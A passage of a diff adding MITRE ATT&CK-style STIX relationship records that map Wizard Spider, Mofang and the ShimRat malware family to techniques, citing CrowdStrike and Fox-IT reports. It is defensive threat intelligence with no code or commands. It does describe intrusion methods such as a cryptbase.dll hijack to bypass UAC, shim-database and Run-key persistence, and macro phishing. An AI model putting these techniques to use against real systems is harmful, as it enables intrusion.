+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7",
+ "target_ref": "malware--00806466-754d-44ea-ad6f-0caf59cb8556",
+ "external_references": [
+ {
+ "source_name": "CrowdStrike Grim Spider May 2019",
+ "url": "https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/",
+ "description": "John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "(Citation: CrowdStrike Grim Spider May 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--02e03773-7cea-4b40-bf96-f22ccbc7187f",
+ "type": "relationship",
+ "modified": "2020-05-12T18:25:44.515Z",
+ "created": "2020-05-12T18:25:44.515Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7",
+ "target_ref": "tool--3433a9e8-1c47-4320-b9bf-ed449061d1c3",
+ "external_references": [
+ {
+ "source_name": "CrowdStrike Grim Spider May 2019",
+ "url": "https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/",
+ "description": "John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "(Citation: CrowdStrike Grim Spider May 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--d73c0fd6-cbd9-4eaa-abca-a1626364ab1b",
+ "type": "relationship",
+ "modified": "2020-05-12T18:25:44.530Z",
+ "created": "2020-05-12T18:25:44.530Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7",
+ "target_ref": "malware--32066e94-3112-48ca-b9eb-ba2b59d2f023",
+ "external_references": [
+ {
+ "source_name": "CrowdStrike Grim Spider May 2019",
+ "url": "https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/",
+ "description": "John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "(Citation: CrowdStrike Grim Spider May 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--8263754e-20a6-49ac-9ffb-3f0e9113b228",
+ "type": "relationship",
+ "modified": "2020-05-12T18:25:44.532Z",
+ "created": "2020-05-12T18:25:44.532Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--dd2d9ca6-505b-4860-a604-233685b802c7",
+ "target_ref": "attack-pattern--2e34237d-8574-43f6-aace-ae2915de8597",
+ "external_references": [
+ {
+ "source_name": "CrowdStrike Grim Spider May 2019",
+ "url": "https://www.crowdstrike.com/blog/timelining-grim-spiders-big-game-hunting-tactics/",
+ "description": "John, E. and Carvey, H. (2019, May 30). Unraveling the Spiderweb: Timelining ATT&CK Artifacts Used by GRIM SPIDER. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[Wizard Spider](https://attack.mitre.org/groups/G0102) has used spearphishing attachments to deliver Microsoft documents containing macros to download either [Emotet](https://attack.mitre.org/software/S0367), Bokbot, or [TrickBot](https://attack.mitre.org/software/S0266).(Citation: CrowdStrike Grim Spider May 2019)",
+ "relationship_type": "uses",
+ "id": "relationship--c671056c-f213-4084-9e9e-3361274ceb80",
+ "type": "relationship",
+ "modified": "2020-05-15T18:52:17.500Z",
+ "created": "2020-05-12T18:42:01.854Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "tool--115f88dd-0618-4389-83cb-98d33ae81848",
+ "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "external_references": [
+ {
+ "source_name": "FOX-IT May 2016 Mofang",
+ "url": "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf",
+ "description": "Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[ShimRatReporter](https://attack.mitre.org/software/S0445) encrypted gathered information with a combination of shifting and XOR using a static key.(Citation: FOX-IT May 2016 Mofang)",
+ "relationship_type": "uses",
+ "id": "relationship--ed1cb231-7e2d-461c-a9c8-56a2d1f43c0f",
+ "type": "relationship",
+ "modified": "2020-05-15T18:47:04.312Z",
+ "created": "2020-05-12T21:44:40.839Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "tool--115f88dd-0618-4389-83cb-98d33ae81848",
+ "target_ref": "attack-pattern--72b74d71-8169-42aa-92e0-e7b04b9f5a08",
+ "external_references": [
+ {
+ "source_name": "FOX-IT May 2016 Mofang",
+ "url": "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf",
+ "description": "Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[ShimRatReporter](https://attack.mitre.org/software/S0445) listed all non-privileged and privileged accounts available on the machine.(Citation: FOX-IT May 2016 Mofang)",
+ "relationship_type": "uses",
+ "id": "relationship--52741f41-28c6-4533-bd26-6dc21f6b0794",
+ "type": "relationship",
+ "modified": "2020-05-15T18:47:04.358Z",
+ "created": "2020-05-12T21:44:40.843Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "tool--115f88dd-0618-4389-83cb-98d33ae81848",
+ "target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
+ "external_references": [
+ {
+ "source_name": "FOX-IT May 2016 Mofang",
+ "url": "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf",
+ "description": "Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[ShimRatReporter](https://attack.mitre.org/software/S0445) listed all running processes on the machine.(Citation: FOX-IT May 2016 Mofang)",
+ "relationship_type": "uses",
+ "id": "relationship--f6ac9b3a-9a1f-40be-b541-bcdb8aac6845",
+ "type": "relationship",
+ "modified": "2020-05-15T18:47:04.357Z",
+ "created": "2020-05-12T21:44:40.855Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "tool--115f88dd-0618-4389-83cb-98d33ae81848",
+ "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
+ "external_references": [
+ {
+ "source_name": "FOX-IT May 2016 Mofang",
+ "url": "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf",
+ "description": "Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[ShimRatReporter](https://attack.mitre.org/software/S0445) gathered the operating system name and specific Windows version of an infected machine.(Citation: FOX-IT May 2016 Mofang)",
+ "relationship_type": "uses",
+ "id": "relationship--c62b3e99-4ab2-4474-b3f7-2779652210f7",
+ "type": "relationship",
+ "modified": "2020-05-15T18:47:04.395Z",
+ "created": "2020-05-12T21:44:40.900Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "tool--115f88dd-0618-4389-83cb-98d33ae81848",
+ "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161",
+ "external_references": [
+ {
+ "source_name": "FOX-IT May 2016 Mofang",
+ "url": "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf",
+ "description": "Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[ShimRatReporter](https://attack.mitre.org/software/S0445) communicated over HTTP with preconfigured C2 servers.(Citation: FOX-IT May 2016 Mofang)",
+ "relationship_type": "uses",
+ "id": "relationship--e29d49a0-7cbf-47a2-b01a-d27056627c81",
+ "type": "relationship",
+ "modified": "2020-05-12T21:44:40.902Z",
+ "created": "2020-05-12T21:44:40.902Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "tool--115f88dd-0618-4389-83cb-98d33ae81848",
+ "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "external_references": [
+ {
+ "source_name": "FOX-IT May 2016 Mofang",
+ "url": "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf",
+ "description": "Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[ShimRatReporter](https://attack.mitre.org/software/S0445) had the ability to download additional payloads.(Citation: FOX-IT May 2016 Mofang)",
+ "relationship_type": "uses",
+ "id": "relationship--137f13ee-0607-47ba-952b-dbe39c1330bb",
+ "type": "relationship",
+ "modified": "2020-05-12T21:44:40.904Z",
+ "created": "2020-05-12T21:44:40.904Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "tool--115f88dd-0618-4389-83cb-98d33ae81848",
+ "target_ref": "attack-pattern--1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2",
+ "external_references": [
+ {
+ "source_name": "FOX-IT May 2016 Mofang",
+ "url": "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf",
+ "description": "Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[ShimRatReporter](https://attack.mitre.org/software/S0445) spoofed itself as AlphaZawgyl_font.exe, a specialized Unicode font.(Citation: FOX-IT May 2016 Mofang)",
+ "relationship_type": "uses",
+ "id": "relationship--772a4f4f-459d-411f-a8e9-2c453274f684",
+ "type": "relationship",
+ "modified": "2020-05-27T22:39:28.858Z",
+ "created": "2020-05-12T21:44:40.918Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "tool--115f88dd-0618-4389-83cb-98d33ae81848",
+ "target_ref": "attack-pattern--774a3188-6ba9-4dc4-879d-d54ee48a5ce9",
+ "external_references": [
+ {
+ "source_name": "FOX-IT May 2016 Mofang",
+ "url": "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf",
+ "description": "Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[ShimRatReporter](https://attack.mitre.org/software/S0445) sent collected system and network information compiled into a report to an adversary-controlled C2.(Citation: FOX-IT May 2016 Mofang)",
+ "relationship_type": "uses",
+ "id": "relationship--d894e46e-1967-4499-83d5-626a8e49a97a",
+ "type": "relationship",
+ "modified": "2020-05-15T18:47:04.423Z",
+ "created": "2020-05-12T21:44:41.002Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "tool--115f88dd-0618-4389-83cb-98d33ae81848",
+ "target_ref": "attack-pattern--30208d3e-0d6b-43c8-883e-44462a514619",
+ "external_references": [
+ {
+ "source_name": "FOX-IT May 2016 Mofang",
+ "url": "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf",
+ "description": "Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[ShimRatReporter](https://attack.mitre.org/software/S0445) gathered information automatically, without instruction from a C2, related to the user and host machine that is compiled into a report and sent to the operators.(Citation: FOX-IT May 2016 Mofang)",
+ "relationship_type": "uses",
+ "id": "relationship--f47a9039-b5c0-49e5-9998-2820b075643f",
+ "type": "relationship",
+ "modified": "2020-05-15T18:47:04.386Z",
+ "created": "2020-05-12T21:44:41.005Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "tool--115f88dd-0618-4389-83cb-98d33ae81848",
+ "target_ref": "attack-pattern--15dbf668-795c-41e6-8219-f0447c0e64ce",
+ "external_references": [
+ {
+ "source_name": "FOX-IT May 2016 Mofang",
+ "url": "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf",
+ "description": "Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[ShimRatReporter](https://attack.mitre.org/software/S0445) gathered the local privileges for the infected host.(Citation: FOX-IT May 2016 Mofang)",
+ "relationship_type": "uses",
+ "id": "relationship--c403720d-da66-45c4-bb35-93b3b35c87c3",
+ "type": "relationship",
+ "modified": "2020-05-15T18:47:04.393Z",
+ "created": "2020-05-12T21:44:41.012Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "tool--115f88dd-0618-4389-83cb-98d33ae81848",
+ "target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0",
+ "external_references": [
+ {
+ "source_name": "FOX-IT May 2016 Mofang",
+ "url": "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf",
+ "description": "Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[ShimRatReporter](https://attack.mitre.org/software/S0445) gathered the local proxy, domain, IP, routing tables, mac address, gateway, DNS servers, and DHCP status information from an infected host.(Citation: FOX-IT May 2016 Mofang)",
+ "relationship_type": "uses",
+ "id": "relationship--c3e022e8-5759-4d38-8536-adaf9e952717",
+ "type": "relationship",
+ "modified": "2020-05-15T18:47:04.430Z",
+ "created": "2020-05-12T21:44:41.016Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "tool--115f88dd-0618-4389-83cb-98d33ae81848",
+ "target_ref": "attack-pattern--e3b6daca-e963-4a69-aee6-ed4fd653ad58",
+ "external_references": [
+ {
+ "source_name": "FOX-IT May 2016 Mofang",
+ "url": "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf",
+ "description": "Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[ShimRatReporter](https://attack.mitre.org/software/S0445) gathered a list of installed software on the infected host.(Citation: FOX-IT May 2016 Mofang)",
+ "relationship_type": "uses",
+ "id": "relationship--222ce94a-bb33-476b-b4c3-56b529d9af03",
+ "type": "relationship",
+ "modified": "2020-05-15T18:47:04.397Z",
+ "created": "2020-05-12T21:44:41.020Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--5763217a-05b6-4edd-9bca-057e47b5e403",
+ "target_ref": "attack-pattern--69b8fd78-40e8-4600-ae4d-662c9d7afdb3",
+ "external_references": [
+ {
+ "source_name": "FOX-IT May 2016 Mofang",
+ "url": "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf",
+ "description": "Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[ShimRat](https://attack.mitre.org/software/S0444) can use pre-configured HTTP proxies.(Citation: FOX-IT May 2016 Mofang)",
+ "relationship_type": "uses",
+ "id": "relationship--0d1314fe-7fd6-4816-abb8-4b9872478807",
+ "type": "relationship",
+ "modified": "2020-05-12T21:56:32.904Z",
+ "created": "2020-05-12T21:56:32.904Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--5763217a-05b6-4edd-9bca-057e47b5e403",
+ "target_ref": "attack-pattern--d63a3fb8-9452-4e9d-a60a-54be68d5998c",
+ "external_references": [
+ {
+ "source_name": "FOX-IT May 2016 Mofang",
+ "url": "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf",
+ "description": "Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[ShimRat](https://attack.mitre.org/software/S0444) can uninstall itself from compromised hosts, as well create and modify directories, delete, move, copy, and rename files.(Citation: FOX-IT May 2016 Mofang)",
+ "relationship_type": "uses",
+ "id": "relationship--7288054b-0679-497a-b4c5-090801b06941",
+ "type": "relationship",
+ "modified": "2020-05-27T23:35:41.300Z",
+ "created": "2020-05-12T21:56:32.909Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--5763217a-05b6-4edd-9bca-057e47b5e403",
+ "target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
+ "external_references": [
+ {
+ "source_name": "FOX-IT May 2016 Mofang",
+ "url": "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf",
+ "description": "Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[ShimRat](https://attack.mitre.org/software/S0444) can download additional files.(Citation: FOX-IT May 2016 Mofang)",
+ "relationship_type": "uses",
+ "id": "relationship--0177d430-a0b9-4f2f-8c66-8dfa4391611a",
+ "type": "relationship",
+ "modified": "2020-05-27T23:35:41.302Z",
+ "created": "2020-05-12T21:56:32.975Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--5763217a-05b6-4edd-9bca-057e47b5e403",
+ "target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18",
+ "external_references": [
+ {
+ "source_name": "FOX-IT May 2016 Mofang",
+ "url": "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf",
+ "description": "Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[ShimRat](https://attack.mitre.org/software/S0444) can list directories.(Citation: FOX-IT May 2016 Mofang)",
+ "relationship_type": "uses",
+ "id": "relationship--ec095867-cb54-4fcf-b2c7-00e805bf7500",
+ "type": "relationship",
+ "modified": "2020-05-27T23:35:41.298Z",
+ "created": "2020-05-12T21:56:32.979Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--5763217a-05b6-4edd-9bca-057e47b5e403",
+ "target_ref": "attack-pattern--3489cfc5-640f-4bb3-a103-9137b97de79f",
+ "external_references": [
+ {
+ "source_name": "FOX-IT May 2016 Mofang",
+ "url": "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf",
+ "description": "Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[ShimRat](https://attack.mitre.org/software/S0444) can enumerate connected drives for infected host machines.(Citation: FOX-IT May 2016 Mofang)",
+ "relationship_type": "uses",
+ "id": "relationship--d2ef2109-c65f-452b-bb5b-dd06d1b16602",
+ "type": "relationship",
+ "modified": "2020-05-27T23:35:41.301Z",
+ "created": "2020-05-12T21:56:32.981Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--5763217a-05b6-4edd-9bca-057e47b5e403",
+ "target_ref": "attack-pattern--120d5519-3098-4e1c-9191-2aa61232f073",
+ "external_references": [
+ {
+ "source_name": "FOX-IT May 2016 Mofang",
+ "url": "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf",
+ "description": "Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[ShimRat](https://attack.mitre.org/software/S0444) has hijacked the cryptbase.dll within migwiz.exe to escalate privileges. This prevented the User Access Control window from appearing.(Citation: FOX-IT May 2016 Mofang)",
+ "relationship_type": "uses",
+ "id": "relationship--4439e86a-de1d-4ea6-a856-858b799bcdc5",
+ "type": "relationship",
+ "modified": "2020-05-27T23:35:41.356Z",
+ "created": "2020-05-12T21:56:33.013Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--5763217a-05b6-4edd-9bca-057e47b5e403",
+ "target_ref": "attack-pattern--42fe883a-21ea-4cfb-b94a-78b6476dcc83",
+ "external_references": [
+ {
+ "source_name": "FOX-IT May 2016 Mofang",
+ "url": "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf",
+ "description": "Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[ShimRat](https://attack.mitre.org/software/S0444) has installed shim databases in the AppPatch folder.(Citation: FOX-IT May 2016 Mofang)",
+ "relationship_type": "uses",
+ "id": "relationship--9ec20e7b-8996-4f16-b830-1f8a0e99b778",
+ "type": "relationship",
+ "modified": "2020-05-27T23:35:41.400Z",
+ "created": "2020-05-12T21:56:33.019Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--5763217a-05b6-4edd-9bca-057e47b5e403",
+ "target_ref": "attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32",
+ "external_references": [
+ {
+ "source_name": "FOX-IT May 2016 Mofang",
+ "url": "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf",
+ "description": "Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[ShimRat](https://attack.mitre.org/software/S0444) has installed a Windows service to maintain persistence on victim machines.(Citation: FOX-IT May 2016 Mofang)",
+ "relationship_type": "uses",
+ "id": "relationship--caa8b50b-67ab-4de4-b61a-ab89ea8a2e9b",
+ "type": "relationship",
+ "modified": "2020-05-27T23:35:41.401Z",
+ "created": "2020-05-12T21:56:33.022Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--5763217a-05b6-4edd-9bca-057e47b5e403",
+ "target_ref": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279",
+ "external_references": [
+ {
+ "source_name": "FOX-IT May 2016 Mofang",
+ "url": "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf",
+ "description": "Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[ShimRat](https://attack.mitre.org/software/S0444) has installed a registry based start-up key HKCU\\Software\\microsoft\\windows\\CurrentVersion\\Run to maintain persistence should other methods fail.(Citation: FOX-IT May 2016 Mofang)",
+ "relationship_type": "uses",
+ "id": "relationship--6435caf7-2493-4cfb-9ddc-2f672c220251",
+ "type": "relationship",
+ "modified": "2020-05-27T23:28:38.270Z",
+ "created": "2020-05-12T21:56:33.051Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "malware--5763217a-05b6-4edd-9bca-057e47b5e403",
+ "target_ref": "attack-pattern--df8b2a25-8bdf-4856-953c-a04372b1c161",
+ "external_references": [
+ {
+ "source_name": "FOX-IT May 2016 Mofang",
+ "url": "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf",
+ "description": "Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[ShimRat](https://attack.mitre.org/software/S0444) communicated over HTTP and HTTPS with C2 servers.(Citation: FOX-IT May 2016 Mofang)",
+ "relationship_type": "uses",
+ "id": "relationship--80a14bfe-6bf6-4f87-8ae1-5085505656f2",
+ "type": "relationship",
+ "modified": "2020-05-12T21:56:33.057Z",
+ "created": "2020-05-12T21:56:33.057Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--88489675-d216-4884-a98f-49a89fcc1643",
+ "target_ref": "attack-pattern--b3d682b6-98f2-4fb0-aa3b-b4df007ca70a",
+ "external_references": [
+ {
+ "source_name": "FOX-IT May 2016 Mofang",
+ "url": "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf",
+ "description": "Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020."
+ }
+ ],
+ "description": "[Mofang](https://attack.mitre.org/groups/G0103) has compressed the [ShimRat](https://attack.mitre.org/software/S0444) executable within malicious email attachments. [Mofang](https://attack.mitre.org/groups/G0103) has also encrypted payloads before they are downloaded to victims.(Citation: FOX-IT May 2016 Mofang)",
+ "relationship_type": "uses",
+ "id": "relationship--8ba71919-c776-4e1b-ad71-160649060d3e",
+ "type": "relationship",
+ "modified": "2020-05-15T18:20:15.802Z",
+ "created": "2020-05-12T22:05:50.738Z"
+ },
+ {
+ "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
+ "object_marking_refs": [
+ "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
+ ],
+ "source_ref": "intrusion-set--88489675-d216-4884-a98f-49a89fcc1643",
+ "target_ref": "attack-pattern--232b7f21-adf9-4b42-b936-b9d6f7df856e",
+ "external_references": [
+ {
+ "source_name": "FOX-IT May 2016 Mofang",
+ "url": "https://foxitsecurity.files.wordpress.com/2016/06/fox-it_mofang_threatreport_tlp-white.pdf",
+ "description": "Yonathan Klijnsma. (2016, May 17). Mofang: A politically motivated information stealing adversary. Retrieved May 12, 2020."
+ }
+ ],
